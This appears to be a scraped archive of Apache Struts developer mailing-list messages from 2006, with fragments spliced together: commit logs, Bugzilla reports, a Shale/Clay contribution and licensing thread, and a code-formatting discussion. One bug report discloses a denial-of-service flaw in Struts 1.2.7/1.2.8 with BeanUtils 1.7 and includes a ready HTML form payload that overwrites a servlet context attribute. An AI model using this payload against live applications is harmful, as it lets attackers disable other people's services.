We can exercise some discretion as to minor patches, but for larger

nowadays, ASF PMCs can and do ask for CLAs. It's just a matter of

URL: http://svn.apache.org/viewcvs?rev=375303view=rev
Log:
Add an empty META-INF/faces-config.xml resource for the component library
JAR that is built up in the Tiger Extensions unit tests. This is now needed
to trigger scanning the JAR for classes with Tiger Extensions annotations.

   Summary: DOS attack, application hack
   Product: Struts
   Version: 1.2.7
  Platform: Other
OS/Version: other
Status: NEW
  Severity: critical
  Priority: P5
 Component: Action
AssignedTo: dev@struts.apache.org
ReportedBy: [EMAIL PROTECTED]

in ActionForm the method getMultipartRequestHandler() is public and gives
access to the request, the implementation CommonsMultipartRequestHandler gives
access to servletContext, and BeanUtils 1.7 gives the posibility to set an
attribute in context. In othwer words the following html code hacks an
application made with struts 1.2.7 and 1.2.8 and bean utils 1.7

form method=post enctype=multipart/form-data
action=http://whateverdotcom/x.do;
input type=hidden
name=multipartRequestHandler.servlet.servletContext.attribute(org.apache.struts.action.MODULE)
value=exe/
input type=submit/
/form

It was tested against 1.2.7 and beanutils 1.7 . The source code of 1.2.8 shows
no change.
An work arround is to use a prior 1.7 beanutils

2006-02-06 Thread Ryan Wynn
Hello,

I have some code that I believe might be helpful in showcasing the
strengths of shale and clay. You can grab the code from
http://issues.apache.org/bugzilla/show_bug.cgi?id=38482.

It demonstrates usage of shale remoting for static resources and
contains examples of some clay component trees that are reusable.

I have tested it with both the sun reference impl and myfaces, IE and
firefox, on tomcat.

Please let me know what you think.

Thanks,
Ryan

Ryan, I think this is a very interesting example. At minimum, I'd like to see
this become a Clay usecase example project in it's own. I think that this
belongs outside of the Clay baseline.

Having said that, I'm looking for a Struts PMC member to give us direction.
Craig, What are your thoughts?

 Thanks,
 Ryan

   Summary: [shale] clay not handling binding attribute correctly
   Product: Struts
   Version: Nightly Build
  Platform: All
OS/Version: All
Status: NEW
  Severity: normal
  Priority: P2
 Component: Shale
AssignedTo: dev@struts.apache.org
ReportedBy: [EMAIL PROTECTED]

clay is only respecting the binding attribute on a component definition during
the restore view phase. the binding is not being established upon creation of
the component. If initially the binding expression returns a component, use
that component instead of creating one. If the binding expression returns
null, then create the component and set it into the binding expression.

I'll take a look at this tonight. I have no problem with setting up more
examples ... indeed, that's part of the reason I refactored the build
artifacts a bit, so the download would not get bloated by multiple copies of
the dependencies.

 For a contribution this big, we'll also need to make sure that Ryan (and
any other authors) fill out and submit an Individual Contributor License
Agreement (ICLA) [1], unless this would be covered by a Corporate CLA from
his employer already.

 Thanks,
  Ryan

Actually, an ICLA would still be needed. The ICLA is always needed, whereas
the CCLA is only needed if the employer feels they need to have one.

For the sake of aggregating ideas, I am including a link to the
CancellableFormController class in the Spring Framework. While we did not go
ahead with the idea that the action should implement an specific interface to be
cancellable, if we ever switch our minds, this is a reference:

Re: Checkstyle (was svn commit: r360442 [1/3] )

2006-02-06 Thread Wendy Smoak
On 2/5/06, Wendy Smoak [EMAIL PROTECTED] wrote:

 The long lines are a problem. Not fixing them is one thing, but it
 wants to make this change, which *creates* a line longer than 80
 characters:

 -protected String processorClass =
 -org.apache.struts.chain.ComposableRequestProcessor;
 +protected String processorClass =
 org.apache.struts.chain.ComposableRequestProcessor;

From the sf.net forum:
   Preferences-printer-wrapping-wrap after assignments (make sure
this is checked)

I'm not using the GUI, but that was enough of a hint, and r375446
seems to have helped.

But Jalopy is still insisting on long lines for method declarations,
such as (in ActionForm):
public ActionErrors validate(ActionMapping mapping, ServletRequest
request) {

and for method calls (in ActionRedirect):

result.append(parameterString=).append(getParameterString()).append(]);
(though that one could just as well be split into two lines.)

It also makes this change:
-} else {
+}
+else {
which causes Checkstyle to complain that '} should be on the same line'.

Patches for the config file (build/jalopy_struts.xml) are welcome!
I'm testing with 'maven jalopy' in struts-action. Since it was
already reformatted, it's easy to see (with 'svn diff') where Jalopy
is making changes that it shouldn't.

Thanks,
Wendy
